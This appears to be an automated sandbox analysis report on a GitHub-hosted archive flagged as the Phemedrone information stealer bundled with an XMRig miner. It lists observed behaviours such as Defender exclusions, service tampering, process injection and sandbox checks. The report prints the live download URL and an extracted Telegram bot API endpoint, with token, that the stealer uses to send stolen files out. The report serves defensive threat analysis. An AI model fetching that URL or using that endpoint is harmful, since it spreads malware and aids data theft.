phemedrone | hxxps://github[.]com/Supremetrysi/java/raw/main/java[.]rar

Analysis

max time kernel
95s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-09-2024 17:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Supremetrysi/java/raw/main/java.rar

Score

10^/10

phemedrone xmrig discovery evasion execution miner persistence stealer upx

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7409385165:AAHDnOsiLDMwjv8rdk_VLf2May0J5Oj0YjI/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3260-522-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3260-524-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3260-527-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3260-528-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3260-526-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3260-525-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3260-521-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4300 powershell.exe
4844 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Drops file in Drivers directory 2 IoCs

Processes:

zrgqfbcavrkx.exejava8.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts zrgqfbcavrkx.exe
File created C:\Windows\system32\drivers\etc\hosts java8.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 3 IoCs

Processes:

java8.exeoptionsof.exezrgqfbcavrkx.exe

pid process

2284 java8.exe
3824 optionsof.exe
4000 zrgqfbcavrkx.exe

pid	process
4300	powershell.exe
4844	powershell.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	zrgqfbcavrkx.exe
File created	C:\Windows\system32\drivers\etc\hosts	java8.exe

pid	process
2284	java8.exe
3824	optionsof.exe
4000	zrgqfbcavrkx.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/3260-517-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-519-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-522-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-524-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-527-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-528-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-526-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-525-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-520-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-521-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-518-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3260-516-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

49 raw.githubusercontent.com
50 raw.githubusercontent.com
46 raw.githubusercontent.com
47 raw.githubusercontent.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4172 powercfg.exe
1440 powercfg.exe
3168 powercfg.exe
5088 powercfg.exe
4648 powercfg.exe
4520 powercfg.exe
1152 powercfg.exe
4060 powercfg.exe

flow	ioc
49	raw.githubusercontent.com
50	raw.githubusercontent.com
46	raw.githubusercontent.com
47	raw.githubusercontent.com

pid	process
4172	powercfg.exe
1440	powercfg.exe
3168	powercfg.exe
5088	powercfg.exe
4648	powercfg.exe
4520	powercfg.exe
1152	powercfg.exe
4060	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

java8.exepowershell.exezrgqfbcavrkx.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	java8.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	zrgqfbcavrkx.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

optionsof.exezrgqfbcavrkx.exe

description	pid	process	target process
PID 3824 set thread context of 4820	3824	optionsof.exe	RegAsm.exe
PID 4000 set thread context of 4268	4000	zrgqfbcavrkx.exe	conhost.exe
PID 4000 set thread context of 3260	4000	zrgqfbcavrkx.exe	svchost.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2136	sc.exe
232	sc.exe
3108	sc.exe
1316	sc.exe
1968	sc.exe
3504	sc.exe
4072	sc.exe
4976	sc.exe
1180	sc.exe
4764	sc.exe
4116	sc.exe
4992	sc.exe
4400	sc.exe
4340	sc.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3864 4820 WerFault.exe RegAsm.exe

pid	pid_target	process	target process
3864	4820	WerFault.exe	RegAsm.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

optionsof.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	optionsof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings firefox.exe
NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\java.rar:Zone.Identifier firefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\java.rar:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exejava8.exepowershell.exezrgqfbcavrkx.exepowershell.exe

pid	process
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
2284	java8.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
2284	java8.exe
760	taskmgr.exe
4000	zrgqfbcavrkx.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
760	taskmgr.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
4000	zrgqfbcavrkx.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

4300 7zFM.exe

pid	process
4300	7zFM.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

firefox.exe7zFM.exetaskmgr.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	4344	firefox.exe
Token: SeDebugPrivilege	4344	firefox.exe
Token: SeDebugPrivilege	4344	firefox.exe
Token: SeRestorePrivilege	4300	7zFM.exe
Token: 35	4300	7zFM.exe
Token: SeSecurityPrivilege	4300	7zFM.exe
Token: SeDebugPrivilege	760	taskmgr.exe
Token: SeSystemProfilePrivilege	760	taskmgr.exe
Token: SeCreateGlobalPrivilege	760	taskmgr.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeShutdownPrivilege	4060	powercfg.exe
Token: SeCreatePagefilePrivilege	4060	powercfg.exe
Token: SeShutdownPrivilege	4648	powercfg.exe
Token: SeCreatePagefilePrivilege	4648	powercfg.exe
Token: SeShutdownPrivilege	4520	powercfg.exe
Token: SeCreatePagefilePrivilege	4520	powercfg.exe
Token: SeShutdownPrivilege	1152	powercfg.exe
Token: SeCreatePagefilePrivilege	1152	powercfg.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeShutdownPrivilege	4172	powercfg.exe
Token: SeCreatePagefilePrivilege	4172	powercfg.exe
Token: SeShutdownPrivilege	5088	powercfg.exe
Token: SeCreatePagefilePrivilege	5088	powercfg.exe
Token: SeShutdownPrivilege	3168	powercfg.exe
Token: SeCreatePagefilePrivilege	3168	powercfg.exe
Token: SeShutdownPrivilege	1440	powercfg.exe
Token: SeCreatePagefilePrivilege	1440	powercfg.exe
Token: SeLockMemoryPrivilege	3260	svchost.exe
Token: SeSecurityPrivilege	760	taskmgr.exe
Token: SeTakeOwnershipPrivilege	760	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exe7zFM.exetaskmgr.exe

pid	process
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4300	7zFM.exe
4300	7zFM.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exetaskmgr.exe

pid	process
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
4344	firefox.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe
760	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

firefox.exe

pid process

4344 firefox.exe
4344 firefox.exe
4344 firefox.exe
4344 firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4060 wrote to memory of 4344	4060	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 1672	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe
PID 4344 wrote to memory of 2524	4344	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Supremetrysi/java/raw/main/java.rar"
1⤵
- Suspicious use of WriteProcessMemory
PID:4060

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Supremetrysi/java/raw/main/java.rar
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4344

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {377cfcf4-87ed-46be-ac4d-79fb76096828} 4344 "\\.\pipe\gecko-crash-server-pipe.4344" gpu
3⤵
PID:1672

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12483e21-b5cc-4314-a9d0-ec8ee2162594} 4344 "\\.\pipe\gecko-crash-server-pipe.4344" socket
3⤵
PID:2524

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3104 -childID 1 -isForBrowser -prefsHandle 3044 -prefMapHandle 3088 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1152bc6-b670-4c6b-8326-eb5a253b1e4a} 4344 "\\.\pipe\gecko-crash-server-pipe.4344" tab
3⤵
PID:1520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2792 -childID 2 -isForBrowser -prefsHandle 3504 -prefMapHandle 3580 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3906e54-f7bf-4d66-a399-666ade41a6e7} 4344 "\\.\pipe\gecko-crash-server-pipe.4344" tab
3⤵
PID:3120

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4884 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4844 -prefMapHandle 4796 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da5947b5-d270-41d5-ac29-c9fddf7008f7} 4344 "\\.\pipe\gecko-crash-server-pipe.4344" utility
3⤵
- Checks processor information in registry
PID:4296

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5632 -childID 3 -isForBrowser -prefsHandle 5652 -prefMapHandle 5648 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2e02c87-cb6d-4c61-abb1-9e6d0e596d9d} 4344 "\\.\pipe\gecko-crash-server-pipe.4344" tab
3⤵
PID:116

C:\Program Files\Mozilla Firefox\firefox.exe
